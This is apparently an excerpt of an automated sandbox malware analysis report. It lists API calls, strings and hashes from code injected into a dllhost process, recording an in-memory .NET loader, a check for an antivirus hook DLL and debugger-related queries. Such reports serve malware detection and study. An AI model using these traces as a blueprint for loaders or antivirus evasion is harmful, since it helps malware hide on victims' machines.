                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcmemset
                                                                                  • String ID: KiUserExceptionDispatcher$ntdll.dll

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • lstrcmpiA.KERNEL32(?,psdk.dll), ref: 7FE43457
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 7FE4346D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadlstrcmpi
                                                                                  • String ID: psdk.dll

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 7FE4257F: lstrlen.KERNEL32(?,?,?,00000000,?,7FE41777,?,/etc/plugins.plist,?), ref: 7FE4259C
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00101000,00000040,00000000,?,?,?), ref: 7FE419A3
                                                                                  • memcpy.NTDLL(00000000,?,?), ref: 7FE419C2
                                                                                  • memcpy.NTDLL(?,?,00000000), ref: 7FE419EC
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 7FE41A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtualmemcpy$AllocFreelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 788548360-0
                                                                                  • Opcode ID: cee9e5a2a796590ad135f83df95848a426f52fc6f6f870058f101b6e77233287
                                                                                  • Instruction ID: d3b4805ca6afd1a5d8c4d5f4bd2ba4f5957bf034018e57e24973636439659fbd
                                                                                  • Opcode Fuzzy Hash: cee9e5a2a796590ad135f83df95848a426f52fc6f6f870058f101b6e77233287
                                                                                  • Instruction Fuzzy Hash: 6B31F672900304BFCF228F65ED45ABE77A9EF40369B20551EF906E3100E738E910A760

                                                                                  APIs
                                                                                    • Part of subcall function 7FE42233: GetModuleHandleA.KERNEL32(ntdll.dll,ZwQueryInformationProcess,?,?,?,?,7FE42071), ref: 7FE42251
                                                                                    • Part of subcall function 7FE42233: GetProcAddress.KERNEL32(00000000), ref: 7FE4225A
                                                                                    • Part of subcall function 7FE42233: GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?,?,?,?,7FE42071), ref: 7FE4226F
                                                                                    • Part of subcall function 7FE42233: NtQueryInformationProcess.NTDLL(00000000,?,?,?,7FE42071), ref: 7FE42276
                                                                                    • Part of subcall function 7FE42233: GetModuleHandleA.KERNEL32(ntdll,ZwQueryInformationProcess,?,?,?,7FE42071), ref: 7FE42291
                                                                                    • Part of subcall function 7FE42233: GetProcAddress.KERNEL32(00000000), ref: 7FE42294
                                                                                  • SetErrorMode.KERNELBASE(?,?,?,00000000,?), ref: 7FE42078
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcess$CurrentErrorInformationModeQuery
                                                                                  • String ID:
                                                                                  • API String ID: 3103590671-0
                                                                                  • Opcode ID: 452d2c7bb0da9ed907b922516a740015770f6e4014572d1439f8c07491cb26c7
                                                                                  • Instruction ID: c81483a2e740596f7359404f4a145b5a53b95d5c3c8a9364d5f7ea15b65275e3
                                                                                  • Opcode Fuzzy Hash: 452d2c7bb0da9ed907b922516a740015770f6e4014572d1439f8c07491cb26c7
                                                                                  • Instruction Fuzzy Hash: 42F0C2B29003017AEB116BA1AD01FBF36BEDF51744F11210CFE0295040F7E8E111CA22

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 233 7fe420ec-7fe420f6 LoadLibraryA
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 7FE420F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: e58fb04bf8307ef9e59311ad68e6793ee857856729bfdc2c679c958526c6e4bd
                                                                                  • Instruction ID: bbe97fb0fdf796f7d02d65c7dead2db828113409e6ff866594b2fea672e426be
                                                                                  • Opcode Fuzzy Hash: e58fb04bf8307ef9e59311ad68e6793ee857856729bfdc2c679c958526c6e4bd
                                                                                  • Instruction Fuzzy Hash: 71A00134108202AFCE029B14C84884ABFA1AF89391F048898B48987230C73198919A02

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 234 7fe433b8-7fe433c2 LoadLibraryA
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 7FE433BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: cdfcc11e70e0831f7f02528ebe527d00d7d7741163f98bb48def171ba165424e
                                                                                  • Instruction ID: 3afe84d9f853e1a58d27be4bc39f2d296b439f338d3e94088f2da92acf5e3481
                                                                                  • Opcode Fuzzy Hash: cdfcc11e70e0831f7f02528ebe527d00d7d7741163f98bb48def171ba165424e
                                                                                  • Instruction Fuzzy Hash: B390023950D101DBCE065B51D90C5197F67AB81351B148458B44540130C7314476DB12

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 235 4f0011-4f001e 236 4f002c-4f0034 235->236 237 4f0020-4f0023 235->237 238 4f0036-4f003e VirtualFree 236->238 239 4f0041-4f004a 236->239 237->236 238->239
                                                                                  APIs
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,004F0011,004F0005), ref: 004F003E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820325371.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_4f0000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: 40190bf7e8cdf14306e3f29afdb8aada469a28eae5e895cba225020993eae487
                                                                                  • Instruction ID: 3c1f301522ef5015434a46749cad76ea0735bcdf9e2ead10c693429966e108f8
                                                                                  • Opcode Fuzzy Hash: 40190bf7e8cdf14306e3f29afdb8aada469a28eae5e895cba225020993eae487
                                                                                  • Instruction Fuzzy Hash: ADE0BF34240705AFDB305A35DC49F97B7E8AF44750F108819B5DAE7291CA64F8418B18

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 241 7fe4256c-7fe42571 242 7fe42573-7fe4257d free 241->242 243 7fe4257e 241->243 242->243
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  • Opcode ID: 2fd9a7ee28f7a9333433644eb5513e4b942047d29e54c439f2e627505d0e5c23
                                                                                  • Instruction ID: f565952d912d69a959799ff31dc89a885d8eb9134e4b96f74b8ad5ccf2072eb3
                                                                                  • Opcode Fuzzy Hash: 2fd9a7ee28f7a9333433644eb5513e4b942047d29e54c439f2e627505d0e5c23
                                                                                  • Instruction Fuzzy Hash: 18B09235009300EBCA014E90D6083A9BBA6EB80616F20841CB057100A087344824EA02
                                                                                  APIs
                                                                                  • CoInitializeEx.COMBASE(00000000,00000000), ref: 7FE436E1
                                                                                    • Part of subcall function 7FE43663: LoadLibraryW.KERNEL32(mscoree.dll,00000000,X>(",00000000,00033400,?,7FE43722,?), ref: 7FE43671
                                                                                  • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 7FE4377B
                                                                                  • memcpy.NTDLL(?,?,X>("), ref: 7FE437AB
                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 7FE4381A
                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 7FE43831
                                                                                  • GetCommandLineW.KERNEL32(?), ref: 7FE43853
                                                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 7FE4385A
                                                                                  • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 7FE4386D
                                                                                  • SafeArrayCreateVector.OLEAUT32(00000008,00000000,?), ref: 7FE43881
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 7FE43894
                                                                                  • SafeArrayPutElement.OLEAUT32(7FE42E35,?,00000000), ref: 7FE438A2
                                                                                  • SafeArrayCreateVector.OLEAUT32(00000008,00000000,00000001), ref: 7FE438BA
                                                                                  • SysAllocString.OLEAUT32(7FE453F4), ref: 7FE438C4
                                                                                  • SafeArrayPutElement.OLEAUT32(7FE42E35,?,00000000), ref: 7FE438D2
                                                                                  • SafeArrayDestroy.OLEAUT32(7FE42E35), ref: 7FE4390E
                                                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 7FE43913
                                                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 7FE4392B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$Create$DestroyVector$AllocBoundCommandElementLineString$ArgvInitializeLibraryLoadmemcpy
                                                                                  • String ID: X>("
                                                                                  • API String ID: 1402434309-2302009221
                                                                                  • Opcode ID: 5e5e04b494e50c0cdfeba50543377363f6c7516b20a2b1ab4e64372355080cbf
                                                                                  • Instruction ID: fc6f7cf24404cfcf3d7afd4173260bed971fdfda6a4a432beba6904d6f1273b5
                                                                                  • Opcode Fuzzy Hash: 5e5e04b494e50c0cdfeba50543377363f6c7516b20a2b1ab4e64372355080cbf
                                                                                  • Instruction Fuzzy Hash: 49916C75A00209EFDB00DFA5C884AEEBBB9FF48354F104068F90AEB260D731A956DF51
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,CorBindToRuntime), ref: 7FE434E6
                                                                                  • GetProcAddress.KERNEL32(?,GetCORVersion), ref: 7FE434F1
                                                                                  • GetProcAddress.KERNEL32(?,GetRequestedRuntimeInfo), ref: 7FE434FC
                                                                                  • wcscmp.NTDLL ref: 7FE43525
                                                                                  • wcscmp.NTDLL ref: 7FE43544
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$wcscmp
                                                                                  • String ID: 2$CorBindToRuntime$GetCORVersion$GetRequestedRuntimeInfo$v1.0.3705$v2.0.50727
                                                                                  • API String ID: 983638816-2194063276
                                                                                  • Opcode ID: 851bd8ff7da982f9098ecc1943af40099da2c3e3c62217fab860e5e858954dc2
                                                                                  • Instruction ID: 3e50560d5e1eeb36687fdd8f9e3dcfe970e9a1f44889845de766484beba81e0f
                                                                                  • Opcode Fuzzy Hash: 851bd8ff7da982f9098ecc1943af40099da2c3e3c62217fab860e5e858954dc2
                                                                                  • Instruction Fuzzy Hash: F6210E76D00309BFDF11CFE6DD849EEBBBDAB042A4F10912EB916E6140D774E604AB50
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,7FE453D0,00000000,7FE42E0C,7FE453D0), ref: 7FE43310
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 7FE4331F
                                                                                  • memcpy.NTDLL(00000000,22283E58,?), ref: 7FE4333F
                                                                                  • memcpy.NTDLL(?,22283E58,00000000), ref: 7FE4336A
                                                                                  • IsBadReadPtr.KERNEL32(?,?), ref: 7FE43391
                                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 7FE433AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$memcpy$AllocateFreeProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 722247336-0
                                                                                  • Opcode ID: 552fac5a70bfc6c263aafda12b09075c372027dd2ebab31769e8de2eac42fedc
                                                                                  • Instruction ID: e3500ff868ffef222200554de9f898f7f0b9cc85ff7932ac3d777bba641bc37d
                                                                                  • Opcode Fuzzy Hash: 552fac5a70bfc6c263aafda12b09075c372027dd2ebab31769e8de2eac42fedc
                                                                                  • Instruction Fuzzy Hash: 8F218D76900300EFCB11CFA9D884BAAB7F9FF44349F148459F91AE7111D771A598EB60
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(mscoree.dll,00000000,X>(",00000000,00033400,?,7FE43722,?), ref: 7FE43671
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,CorBindToRuntime), ref: 7FE434E6
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,GetCORVersion), ref: 7FE434F1
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,GetRequestedRuntimeInfo), ref: 7FE434FC
                                                                                    • Part of subcall function 7FE434AF: wcscmp.NTDLL ref: 7FE43525
                                                                                    • Part of subcall function 7FE434AF: wcscmp.NTDLL ref: 7FE43544
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$wcscmp$LibraryLoad
                                                                                  • String ID: X>("$mscoree.dll$v2.0.50727$v4.0.30319
                                                                                  • API String ID: 3438369058-3763104332
                                                                                  • Opcode ID: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction ID: d3d31f5be46057649fb9b99c077c88d5e31ad3076790e6f087b55fb3520f1749
                                                                                  • Opcode Fuzzy Hash: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction Fuzzy Hash: 26F0A972902325BFF71296657D41EFB75ACCB411D4F1021ADF901A2240D6B09E0076B5
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                  • API String ID: 1646373207-3024904723
                                                                                  • Opcode ID: fa89db43dd185a1453fcf4f790fbcd5a175520637a84c9a2fa416bbfb15f58e2
                                                                                  • Instruction ID: 54fe31d5977995978b315a9fd433e02c4f518c0bef640df39cf22da13bcb4d8d
                                                                                  • Opcode Fuzzy Hash: fa89db43dd185a1453fcf4f790fbcd5a175520637a84c9a2fa416bbfb15f58e2
                                                                                  • Instruction Fuzzy Hash: E6E03039E0030AAFDB01CBA5CA0DF9DB6BDAF4526AB604159A805D6000E735D614EA10
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(7FE436C9,CorBindToRuntime), ref: 7FE43635
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: CorBindToRuntime$v2.0.50727$wks
                                                                                  • API String ID: 190572456-3347351501
                                                                                  • Opcode ID: 1c952edf47f5d967c480487307a17a198ad8a415b3d2b670942881798b77bc7c
                                                                                  • Instruction ID: 0c5fc14341107e3be1e4a3b148c5bf2aaf3a514f9beb35c349b5f130446ce887
                                                                                  • Opcode Fuzzy Hash: 1c952edf47f5d967c480487307a17a198ad8a415b3d2b670942881798b77bc7c
                                                                                  • Instruction Fuzzy Hash: FCD02E32308323ABD6119E657C00FBABBA6AF402C0F00372DBE80EC124C341D035A38A
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: $$$DbgUserBreakPoint
                                                                                  • API String ID: 2221118986-3284380563
                                                                                  • Opcode ID: f41bbd2ad5d204c1819bf145e7111d98b5bb1373749e436e17a0d8b8869e6680
                                                                                  • Instruction ID: bbb4ff28fefea5246b1a415e85eba509f200322f977f728c9ce93df5bd6fac56
                                                                                  • Opcode Fuzzy Hash: f41bbd2ad5d204c1819bf145e7111d98b5bb1373749e436e17a0d8b8869e6680
                                                                                  • Instruction Fuzzy Hash: 8F02F3148097C499DF138A68A0503FDBFF25F43228F28A68DE4E34B6E7C27D6249D356
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: $$$combase.dll
                                                                                  • API String ID: 2221118986-1187780485
                                                                                  • Opcode ID: a92cfde426eaf275d4cdb4ff5bbffa1fe7b5514eabfb562f5d1dbc9aa72339ae
                                                                                  • Instruction ID: 073b19536da68552c2ef516f0e74b594634c8d8f7233081d7479257ca9af4b1c
                                                                                  • Opcode Fuzzy Hash: a92cfde426eaf275d4cdb4ff5bbffa1fe7b5514eabfb562f5d1dbc9aa72339ae
                                                                                  • Instruction Fuzzy Hash: D702F724C087C599DB168A78805D3EDBFF29F43228F9986CDC4D31BA97C27E6249D352
                                                                                  APIs
                                                                                  • memset.NTDLL ref: 7FE42D8F
                                                                                  • memset.NTDLL ref: 7FE42D9D
                                                                                    • Part of subcall function 7FE4257F: lstrlen.KERNEL32(?,?,?,00000000,?,7FE41777,?,/etc/plugins.plist,?), ref: 7FE4259C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$lstrlen
                                                                                  • String ID: /pkg/Loader.exe$X>("
                                                                                  • API String ID: 810095026-1983462030
                                                                                  • Opcode ID: 3d4c5262710afe944422458cd2da0bc82c01e9077a17efada0eb841bf3cd5f34
                                                                                  • Instruction ID: 53c5c49a1a72ff726aaeb956e843ea171699dcfe35651cd7620813fce0329fec
                                                                                  • Opcode Fuzzy Hash: 3d4c5262710afe944422458cd2da0bc82c01e9077a17efada0eb841bf3cd5f34
                                                                                  • Instruction Fuzzy Hash: A8E0DF7A6663007AD200CF0ABC41F3936ECE746B50F38220DBE44AE288D3E020094789
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(7FE436AF,CLRCreateInstance), ref: 7FE4359C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: CLRCreateInstance$v4.0.30319
                                                                                  • API String ID: 190572456-303888047
                                                                                  • Opcode ID: ee11bf2f7cd5b6165e65e907bb3e342fbf2494dd9a6e8d7db98cfb98964fecc3
                                                                                  • Instruction ID: 4049353a07a8ef2bd98e8e00e1d987354befd7e798cdf1343371d813bbfb0654
                                                                                  • Opcode Fuzzy Hash: ee11bf2f7cd5b6165e65e907bb3e342fbf2494dd9a6e8d7db98cfb98964fecc3
                                                                                  • Instruction Fuzzy Hash: 3F215E70B04246EFEB10CF95E945FBE7BB9EF84255B10529CB806EB210D771EA11EB20
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(7FE453B0), ref: 004F02B0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820325371.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_4f0000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: v2.0.50727$v4.0.30319
                                                                                  • API String ID: 1029625771-3789287155
                                                                                  • Opcode ID: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction ID: 7622eda474caacee72b1491d530f8e7e5a150ef8a972d25177cea66a555d9446
                                                                                  • Opcode Fuzzy Hash: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction Fuzzy Hash: 92F0A962A0221CBBDB1117955D49A7F765C8BC13D9F25016BFF01A2203D6B88E4192BD
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(aswhook.dll,7FE31BBA), ref: 7FE31F35
                                                                                  • DisableThreadLibraryCalls.KERNEL32(00000000), ref: 7FE31F40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallsDisableHandleLibraryModuleThread
                                                                                  • String ID: aswhook.dll
                                                                                  • API String ID: 78584604-2561582699
                                                                                  • Opcode ID: d74cb2dd0cf48b6df68db21c6a49973dbb8b91d3aa3364bb512230de829d39d3
                                                                                  • Instruction ID: ebe0215c953d00e54fa583c8f1e870bcfd19df2d92563f2361f67c6791dd81a8
                                                                                  • Opcode Fuzzy Hash: d74cb2dd0cf48b6df68db21c6a49973dbb8b91d3aa3364bb512230de829d39d3
                                                                                  • Instruction Fuzzy Hash: CAB012BDF002045BBE101F734B0CB0935AF6F8237335482D46883D9000CF24C014CD20

                                                                                  Execution Graph

                                                                                  Execution Coverage:9.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:3.1%
                                                                                  Total number of Nodes:671
                                                                                  Total number of Limit Nodes:14

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00405B02
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00405B0B
                                                                                  • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 00405B1D
                                                                                  • LoadStringW.USER32(00000081,00000001,00000000,00000000), ref: 00405B2A
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00405B38
                                                                                  • KillTimer.USER32(?,00000001), ref: 00405B79
                                                                                  • AnimateWindow.USER32(?,00000BB8,00090000), ref: 00405B8A
                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00405B95
                                                                                  • DefWindowProcW.USER32(?,00000081,?,?), ref: 00405C59
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$LongTimer$AnimateCompatibleCreateKillLoadMessagePostProcString
                                                                                  • String ID:
                                                                                  • API String ID: 2522358032-0
                                                                                  • Opcode ID: 3030fe5b0f7969995eb32f426db33af26adcdaaaba1d73ac6509f2ca98b2a990
                                                                                  • Instruction ID: d2e356219e18b708c0172940fafb97bba7094412dfd2a6634aeebdafb9ad043e
                                                                                  • Opcode Fuzzy Hash: 3030fe5b0f7969995eb32f426db33af26adcdaaaba1d73ac6509f2ca98b2a990
                                                                                  • Instruction Fuzzy Hash: E5418C72604606BBEB215FA1DE8CEAB7B7CFB89701F004425F653B91A2C7749900DF28

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 35 4061e4-40620b HeapCreate 36 406211-40622f HeapAlloc 35->36 37 40659a-40659e 35->37 38 406591-406594 HeapDestroy 36->38 39 406235-40625f HeapAlloc 36->39 38->37 39->38 40 406265-406338 HeapAlloc TlsAlloc TlsSetValue RtlAddVectoredExceptionHandler RtlRemoveVectoredExceptionHandler TlsFree 39->40 41 40657a-40657e 40->41 42 40633e-406386 call 4089e4 call 4065e4 call 406de4 call 4082e4 40->42 41->38 43 406580-40658e KiUserCallbackDispatcher 41->43 52 406572-406575 call 408be4 42->52 53 40638c-406394 call 4082e4 42->53 43->38 52->41 57 406397-40639b 53->57 58 4063a1-4063a8 57->58 59 406562-406569 57->59 58->59 61 4063ae-4063c7 call 405fe4 call 4068e4 58->61 59->52 60 40656b-40656e 59->60 60->52 66 4063c9 61->66 67 4063cb-4063e0 61->67 68 406436-40643d 66->68 69 4063e4-4063e8 67->69 70 406443-406474 68->70 71 406507-40650e 68->71 69->68 72 4063ea-4063f9 69->72 73 406490-406499 70->73 74 406476-40647a 70->74 75 406510-406517 71->75 76 406542 71->76 77 406406 72->77 78 4063fb-406404 72->78 83 406502 73->83 84 40649b-4064a4 73->84 80 406481-40648e call 4067e4 74->80 81 40647c 74->81 75->76 82 406519-406520 75->82 85 406546-40655d call 407ae4 call 4082e4 76->85 79 40640a-40641d 77->79 78->79 88 406421-406431 call 4066e4 79->88 89 40641f 79->89 80->83 81->83 82->76 90 406522-406529 82->90 83->68 84->83 86 4064a6-4064c5 84->86 85->57 86->86 92 4064c7-4064dc 86->92 94 406434 88->94 89->94 96 406539-406540 90->96 97 40652b-406537 90->97 92->92 99 4064de-4064f3 92->99 94->69 96->85 97->76 97->96 102 4064f5-4064fd 99->102 103 4064fe-406500 99->103 102->103 103->83 103->86
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00100000,20000000,00000000), ref: 004061FE
